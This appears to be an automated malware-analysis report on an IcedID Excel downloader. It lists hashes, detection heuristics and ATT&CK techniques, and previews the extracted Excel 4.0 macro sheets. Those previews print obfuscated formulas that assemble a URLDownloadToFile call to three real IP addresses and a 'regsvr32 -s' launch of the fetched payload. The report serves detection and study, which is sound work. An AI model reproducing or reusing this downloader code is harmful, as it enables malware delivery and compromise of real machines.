IcedID — Office (OOXML) malware analysis

Static analysis result for SHA-256 565b84bf005e3eec…

MALICIOUS

Office (OOXML)

344.3 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-07-02
MD5: 3fde30a71322ce5b7b72b26f596512ac SHA-1: 8035854b4e0651a64a175a75cc6252185081b63a SHA-256: 565b84bf005e3eec7efb99dc5de3a847e58d45c23c184620347a071af3284a55
250 Risk Score

Malware Insights

IcedID · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution T1105 Ingress Tool Transfer

The sample is an Excel file containing multiple Excel 4.0 macro sheets, identified by critical heuristics. These macros utilize dangerous functions like FORMULA and EXEC to construct and execute commands. Specifically, the reconstructed command 'regsvr tp .d at Dow' combined with the URL fragments suggests an attempt to download and execute a second-stage payload, consistent with the IcedID family's known behavior. The presence of hidden sheets further supports the malicious intent.

Heuristics 6

  • ClamAV: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0
  • Excel 4.0 macro sheet (14 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
  • Dangerous XLM formula APIs: FORMULA, GOTO, HALT critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 14 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 14

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet1.xml 1380 bytes
SHA-256: 83dba5bfbe15006ac89e8f80dd7cef1659412a3734905e1c32eb8daf6ea654c1
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{84AAC8B7-8F02-4658-9B86-A06FF8C7BADD}"><dimension ref="E14"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="4.5703125" style="2"/></cols><sheetData><row r="14" spans="5:5" x14ac:dyDescent="0.25"><c r="E14" s="2" t="str"><f>'1rtgvrt'!F38</f><v>TER("uRlMon","URL</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_01.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet2.xml 1616 bytes
SHA-256: c82a3f1a5a07e2c3dfdeeb07a65d6c60c5bde7fafc322a698567c77157ce96d2
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{D8721A71-CD51-4A41-9113-7F1C72E4210E}"><dimension ref="G11:G18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="6" width="4.5703125" style="2"/><col min="7" max="7" width="12.5703125" style="2" bestFit="1" customWidth="1"/><col min="8" max="16384" width="4.5703125" style="2"/></cols><sheetData><row r="11" spans="7:7" x14ac:dyDescent="0.25"><c r="G11" s="2" t="b"><f>FORMULA(now0!E14,H11)</f><v>0</v></c></row><row r="18" spans="7:7" x14ac:dyDescent="0.25"><c r="G18" s="2" t="e"><f>GOTO(nowik!E11)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_02.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet3.xml 2222 bytes
SHA-256: 2d666c0156d5379ae66f25c08b3a2af99682820e2f3d34113e67d10adba7eb62
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{1A122326-E9BA-4F4E-8218-736BBDAC7C9B}"><dimension ref="E9:H18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="4" width="4.5703125" style="2"/><col min="5" max="5" width="5.5703125" style="2" bestFit="1" customWidth="1"/><col min="6" max="7" width="4.5703125" style="2"/><col min="8" max="8" width="13.42578125" style="2" bestFit="1" customWidth="1"/><col min="9" max="16384" width="4.5703125" style="2"/></cols><sheetData><row r="9" spans="5:8" x14ac:dyDescent="0.25"><c r="H9" s="2" t="b"><f>FORMULA(E13&amp;E14&amp;E16,I9)</f><v>0</v></c></row><row r="13" spans="5:8" x14ac:dyDescent="0.25"><c r="E13" s="2" t="str"><f>T(now!H11)</f><v/></c></row><row r="14" spans="5:8" x14ac:dyDescent="0.25"><c r="E14" s="2" t="str"><f>T('1rtgvrt'!F39&amp;'1rtgvrt'!F40)</f><v>Dow"&amp;"nloadToFile</v></c><c r="H14" s="2" t="e"><f>GOTO('1rtgvrt'!J27)</f><v>#N/A</v></c></row><row r="16" spans="5:8" x14ac:dyDescent="0.25"><c r="E16" s="2" t="str"><f>T('1rtgvrt'!F41&amp;'1rtgvrt'!F42)</f><v>A","JJCCBB","GBHJFgecs",,1,9)</v></c></row><row r="18" spans="5:5" x14ac:dyDescent="0.25"><c r="E18" s="2" t="e"><f>GOTO(H6)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_03.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet4.xml 3859 bytes
SHA-256: 718618d657190573a85de16f29f95f961a6d033973a622ac95381fd8c6bda9d7
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{FFD5319C-BE4D-4645-9F69-A49923E2A0B7}"><dimension ref="F12:O45"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="9" width="4.5703125" style="2"/><col min="10" max="10" width="34.85546875" style="2" bestFit="1" customWidth="1"/><col min="11" max="16384" width="4.5703125" style="2"/></cols><sheetData><row r="12" spans="15:15" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="O12" s="2"><v>0</v></c></row><row r="31" spans="10:10" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="J31" s="2" t="b"><f>FORMULA(G36&amp;nowik!I9,J35)</f><v>0</v></c></row><row r="33" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="J33" s="2"><f>NOW()</f><v>44355.570300462961</v></c></row><row r="34" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="I34" s="2" t="s"><v>5</v></c></row><row r="35" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="I35" s="2" t="s"><v>6</v></c></row><row r="36" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="F36" s="2" t="str"><f>"="</f><v>=</v></c><c r="G36" s="2" t="str"><f>F36&amp;F37</f><v>=REGIS</v></c></row><row r="37" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="F37" s="2" t="str"><f>"REGIS"</f><v>REGIS</v></c><c r="J37" s="2" t="e"><f>GBHJFgecs(O12,K37&amp;I38&amp;J33&amp;I34&amp;I35,"."&amp;".\Jipos.hot5782369",O12,O12)</f><v>#NAME?</v></c><c r="K37" s="2" t="str"><f>K40&amp;K41&amp;K42</f><v>http://</v></c></row><row r="38" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="F38" s="2" t="s"><v>11</v></c><c r="I38" s="2" t="str"><f>"190.14.37.2/"</f><v>190.14.37.2/</v></c></row><row r="39" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="F39" s="2" t="s"><v>7</v></c><c r="I39" s="2" t="str"><f>"194.36.189.154/"</f><v>194.36.189.154/</v></c><c r="J39" s="2" t="e"><f>GBHJFgecs(O12,K37&amp;I39&amp;J33&amp;I34&amp;I35,"."&amp;".\Jipos.hot57823691",O12,O12)</f><v>#NAME?</v></c></row><row r="40" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="F40" s="2" t="str"><f>"ToFile"</f><v>ToFile</v></c><c r="I40" s="2" t="str"><f>"101.99.95.230/"</f><v>101.99.95.230/</v></c><c r="K40" s="2" t="s"><v>8</v></c></row><row r="41" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="F41" s="2" t="s"><v>9</v></c><c r="J41" s="2" t="e"><f>GBHJFgecs(O12,K37&amp;I40&amp;J33&amp;I34&amp;I35,"."&amp;".\Jipos.hot57823692",O12,O12)</f><v>#NAME?</v></c><c r="K41" s="2" t="s"><v>4</v></c></row><row r="42" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="F42" s="2" t="s"><v>10</v></c><c r="K42" s="2" t="str"><f>"://"</f><v>://</v></c></row><row r="45" spans="6:11" s="2" customFormat="1" x14ac:dyDescent="0.25"><c r="J45" s="2" t="e"><f>GOTO('3fescvaer'!H4)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_04.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet5.xml 2313 bytes
SHA-256: 18ffdb2b8fdccdea02e96c749f85a50785a70e432f304017fb5424282e69883f
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{CDFA6BE0-4EC6-4813-BBF5-B10594745E9F}"><dimension ref="D8:K17"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="6" width="4.5703125" style="2"/><col min="7" max="7" width="4.5703125" style="2" customWidth="1"/><col min="8" max="8" width="11.85546875" style="2" bestFit="1" customWidth="1"/><col min="9" max="16384" width="4.5703125" style="2"/></cols><sheetData><row r="8" spans="4:11" x14ac:dyDescent="0.25"><c r="D8" s="2" t="s"><v>0</v></c></row><row r="9" spans="4:11" x14ac:dyDescent="0.25"><c r="D9" s="2" t="s"><v>1</v></c></row><row r="10" spans="4:11" x14ac:dyDescent="0.25"><c r="D10" s="2" t="s"><v>2</v></c><c r="H10" s="2" t="b"><f>FORMULA(K10&amp;K11,I10)</f><v>0</v></c><c r="K10" s="2" t="str"><f>D9&amp;D10</f><v>EXE</v></c></row><row r="11" spans="4:11" x14ac:dyDescent="0.25"><c r="K11" s="2" t="str"><f>D12</f><v>C("regsvr</v></c></row><row r="12" spans="4:11" x14ac:dyDescent="0.25"><c r="D12" s="2" t="s"><v>3</v></c></row><row r="15" spans="4:11" x14ac:dyDescent="0.25"><c r="D15" s="2" t="s"><v>12</v></c><c r="E15" s="2" t="s"><v>13</v></c><c r="F15" s="2" t="s"><v>14</v></c></row><row r="17" spans="8:8" x14ac:dyDescent="0.25"><c r="H17" s="2" t="e"><f>GOTO('4scdac'!E7)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_05.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet6.xml 1743 bytes
SHA-256: d426f8d1ffb9f4cae0b3596b59264854211f5a37409aff811f2b6e3d0b4471fc
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{6935296E-C8D1-4321-B95E-CB5004965B95}"><dimension ref="E8:G17"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="4" width="4.5703125" style="2"/><col min="5" max="5" width="7.7109375" style="2" bestFit="1" customWidth="1"/><col min="6" max="6" width="4.5703125" style="2"/><col min="7" max="7" width="12.28515625" style="2" bestFit="1" customWidth="1"/><col min="8" max="16384" width="4.5703125" style="2"/></cols><sheetData><row r="8" spans="7:7" x14ac:dyDescent="0.25"><c r="G8" s="2" t="b"><f>FORMULA(Vert1!G11,H8)</f><v>0</v></c></row><row r="17" spans="5:7" x14ac:dyDescent="0.25"><c r="E17" s="2" t="e"><f>GOTO(Vert!E4)</f><v>#N/A</v></c><c r="G17" s="2" t="e"><f>GOTO('5fetaert'!F8)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_06.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet7.xml 1740 bytes
SHA-256: 7c938a7bb5e1d49c23f50c7382eb8d69094ccdb58d4425ca8ed1a35098f12ad9
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{30D57234-55D5-4C00-9443-3C2059B4DFE8}"><dimension ref="E6:E14"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="4" width="4.5703125" style="2"/><col min="5" max="5" width="9.28515625" style="2" bestFit="1" customWidth="1"/><col min="6" max="16384" width="4.5703125" style="2"/></cols><sheetData><row r="6" spans="5:5" x14ac:dyDescent="0.25"><c r="E6" s="2" t="e"><f>GOTO(Vert1!G7)</f><v>#N/A</v></c></row><row r="11" spans="5:5" x14ac:dyDescent="0.25"><c r="E11" s="2" t="str"><f>T('3fescvaer'!I10&amp;'3fescvaer'!E15)</f><v>32 -s "&amp;"."&amp;"."&amp;"\"&amp;"Jipos.hot57823691")</v></c></row><row r="14" spans="5:5" x14ac:dyDescent="0.25"><c r="E14" s="2" t="e"><f>GOTO('4scdac'!G4)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_07.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 1585 bytes
SHA-256: 722e5d05ff76efbc613cfc8faf6010a45d36bce5b42c805efd4dad491ab57285
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{C2D55B8D-1432-454E-9930-DD410449DCBC}"><dimension ref="G11:G13"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="6" width="9.140625" style="2"/><col min="7" max="7" width="25.85546875" style="2" customWidth="1"/><col min="8" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="11" spans="7:7" x14ac:dyDescent="0.25"><c r="G11" s="2" t="str"><f>T('3fescvaer'!I10&amp;'3fescvaer'!D15)</f><v>32 -s "&amp;"."&amp;"."&amp;"\"&amp;"Jipos.hot5782369")</v></c></row><row r="13" spans="7:7" x14ac:dyDescent="0.25"><c r="G13" s="2" t="e"><f>GOTO(Vert!E9)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_08.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet8.xml 1795 bytes
SHA-256: bbabdb72f964374a773f09d55c2ef66fa57494857b47c84f6883880468c3e05f
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{078DCCE8-688A-4A64-BAF3-B17F03BE9DA7}"><dimension ref="F12:H19"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="5" width="4.5703125" style="2"/><col min="6" max="6" width="6" style="2" bestFit="1" customWidth="1"/><col min="7" max="7" width="4.5703125" style="2"/><col min="8" max="8" width="11.7109375" style="2" bestFit="1" customWidth="1"/><col min="9" max="16384" width="4.5703125" style="2"/></cols><sheetData><row r="12" spans="8:8" x14ac:dyDescent="0.25"><c r="H12" s="2" t="b"><f>FORMULA(Vert!E11,I12)</f><v>0</v></c></row><row r="19" spans="6:8" x14ac:dyDescent="0.25"><c r="F19" s="2" t="e"><f>GOTO(H10)</f><v>#N/A</v></c><c r="H19" s="2" t="e"><f>GOTO('6vrtgarga'!F8)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_09.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet9.xml 1879 bytes
SHA-256: ee656362086a167f40427380169b904c4e8f6d7223dba3711b5f2ca8ecae3067
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{8BFD2F9D-2703-4B11-B294-3AA1C241D46A}"><dimension ref="F14:H21"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="5" width="4.5703125" style="2"/><col min="6" max="6" width="6" style="2" bestFit="1" customWidth="1"/><col min="7" max="7" width="4.5703125" style="2"/><col min="8" max="8" width="25.140625" style="2" bestFit="1" customWidth="1"/><col min="9" max="16384" width="4.5703125" style="2"/></cols><sheetData><row r="14" spans="8:8" x14ac:dyDescent="0.25"><c r="H14" s="2" t="b"><f>FORMULA.ARRAY('3fescvaer'!I10&amp;'3fescvaer'!F15,I14)</f><v>0</v></c></row><row r="20" spans="6:8" x14ac:dyDescent="0.25"><c r="F20" s="2" t="e"><f>GOTO(H10)</f><v>#N/A</v></c></row><row r="21" spans="6:8" x14ac:dyDescent="0.25"><c r="H21" s="2" t="e"><f>GOTO('7rvgasdg'!F7)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_10.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet10.xml 1920 bytes
SHA-256: 2166c7457651893fa9459576c7b181df82d76c4fcebd021c0c20c24dedc93e62
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{A0188A28-7838-4B0D-9254-F48650F43D63}"><dimension ref="F10:H18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="5" width="4.5703125" style="2"/><col min="6" max="6" width="5.5703125" style="2" bestFit="1" customWidth="1"/><col min="7" max="7" width="4.5703125" style="2"/><col min="8" max="8" width="11.5703125" style="2" bestFit="1" customWidth="1"/><col min="9" max="16384" width="4.5703125" style="2"/></cols><sheetData><row r="10" spans="6:8" x14ac:dyDescent="0.25"><c r="H10" s="2" t="b"><f>FORMULA(F12,H13)</f><v>0</v></c></row><row r="12" spans="6:8" x14ac:dyDescent="0.25"><c r="F12" s="2" t="str"><f>T('3fescvaer'!D8&amp;'4scdac'!H8)</f><v>=</v></c></row><row r="16" spans="6:8" 